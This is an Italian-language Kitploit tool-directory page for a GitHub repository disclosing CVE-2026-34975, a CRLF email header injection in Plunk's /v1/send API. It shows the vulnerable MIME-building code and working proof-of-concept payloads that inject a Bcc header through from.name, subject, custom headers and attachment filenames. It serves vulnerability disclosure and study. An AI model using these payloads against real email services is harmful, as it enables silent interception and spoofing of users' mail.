Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-34975 — CRLF Email Header Injection in Plunk via raw MIME construction — CVSS 8.5 | Kitploit
Strumenti/GitHubGitHub/romain-deperne/cve-2026-34975
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPaper e RicercaSicurezza Email
GitHubromain-deperne/cve-2026-34975

CVE-2026-34975

CRLF Email Header Injection in Plunk via raw MIME construction — CVSS 8.5

Vedi Repository
3 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-34975 — Iniezione di intestazioni email CRLF in Plunk tramite costruzione MIME grezza

Gravità: Alta (CVSS 8.5) CWE: CWE-93 — Neutralizzazione impropria delle sequenze CRLF ('Iniezione CRLF') Componente interessato: useplunk/plunk (tutte le versioni precedenti alla correzione) Advisory: GHSA NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-34975

TL;DR

L'endpoint POST /v1/send di Plunk costruisce un messaggio email MIME grezzo interpolando i campi forniti dall'utente (from.name, subject, intestazioni personalizzate, nomi dei file allegati) direttamente in una stringa template senza sanificazione CRLF (\r\n). Un utente API autenticato può iniettare intestazioni email arbitrarie — inclusa Bcc — per reindirizzare silenziosamente copie delle email a indirizzi controllati dall'attaccante.

Come l'ho trovato

Stavo facendo audit di piattaforme open-source di invio email — qualsiasi cosa che avvolga AWS SES ed esponga un'API. Plunk è presentato come un'alternativa developer-friendly a SendGrid/Postmark, costruita su SES.

Il mio punto di ingresso è stata la funzione di costruzione email grezza. Ogni volta che vedo rawMessage += o template literal che costruiscono MIME, controllo se ogni campo fornito dall'utente è sanificato da CRLF. In SESService.ts, la risposta era chiaramente no: from.name, subject, intestazioni personalizzate e nomi dei file allegati erano tutti interpolati direttamente.

Ciò che ha confermato che fosse sfruttabile: lo schema Zod (packages/shared/src/schemas/index.ts) non aveva .regex() o .refine() che rifiutassero \r\n su nessuno di quei campi. Nessuna sanificazione a livello di schema, nessuna sanificazione a livello di costruzione MIME — percorso pulito dall'input API all'intestazione MIME iniettata.

Ho testato tutti e quattro i vettori (from.name, subject, valore intestazione personalizzata, nome file allegato) e ho confermato che l'iniezione Bcc: funziona. Qualsiasi utente API autenticato con un dominio mittente verificato può copiare silenziosamente ogni email in uscita a un indirizzo controllato dall'attaccante. Lo scenario di attacco realistico è una chiave API compromessa che si trasforma in un'intercettazione email persistente.

Componente interessato

File: apps/api/src/services/SESService.ts, righe 137–151

root@kitploit:~
// Costruzione MIME grezza vulnerabile
let rawMessage = `From: ${from.name} <${from.email}>\r\n` +
                 `To: ${to}\r\n` +
                 `Subject: ${content.subject}\r\n`;

// Intestazioni personalizzate interpolate direttamente
for (const [key, value] of Object.entries(headers)) {
    rawMessage += `${key}: ${value}\r\n`;  // value non sanificato
}

// Nome file allegato
`Content-Disposition: inline; filename="${attachment.filename}"` // non sanificato

Schema Zod (packages/shared/src/schemas/index.ts) — nessuna validazione CRLF:

root@kitploit:~
headers: z.record(z.string().max(998)).optional()   // nessun controllo \r\n
from: { name: z.string().optional() }               // nessun controllo \r\n
subject: z.string().min(1).max(998)                 // nessun controllo \r\n
filename: z.string().min(1).max(255)                // nessun controllo \r\n

Causa principale

La costruzione MIME grezza richiede che ogni valore fornito dall'utente venga privato di \r\n prima dell'interpolazione. Plunk costruisce il messaggio con template literal e non sanifica nessuno dei quattro campi iniettabili. I parser SMTP interpretano \r\n come delimitatore di intestazione, quindi iniettare \r\nBcc: [email protected] in from.name aggiunge una vera intestazione Bcc al messaggio in uscita.

PoC

Vedi poc.py per una dimostrazione completa con quattro vettori di iniezione.

Payload principale — iniezione Bcc tramite from.name:

root@kitploit:~
payload = {
    "to": "[email protected]",
    "subject": "Legit email",
    "body": "<p>Nothing to see here.</p>",
    "from": {
        "name": "Legit Sender\r\nBcc: [email protected]",
        "email": "[email protected]",
    },
}

MIME grezzo prodotto da SES:

root@kitploit:~
From: Legit Sender
Bcc: [email protected] <[email protected]>
To: [email protected]
Subject: Legit email

SES consegna una copia silenziosa a [email protected] con ogni email inviata tramite la chiave API compromessa.

Altri vettori di iniezione:

  • subject: "Legit Subject\r\nBcc: [email protected]"
  • Valore intestazione personalizzata: {"X-Custom": "value\r\nBcc: [email protected]"}
  • Nome file allegato: iniezione del confine MIME

Impatto

  1. Reindirizzamento email silenzioso — BCC di qualsiasi email in uscita a un indirizzo controllato dall'attaccante
  2. Spoofing email — sovrascrittura delle intestazioni Reply-To, Return-Path, Sender
  3. Corruzione della struttura MIME — iniezione di parti MIME arbitrarie tramite il nome file allegato
  4. Richiede solo una chiave API Plunk valida e un dominio mittente verificato — accesso autenticato standard

Cronologia

  • Scoperta: 2026-03-xx
  • Segnalazione: advisory privata GHSA
  • CVE pubblicato: CVE-2026-34975
Scarica lo strumento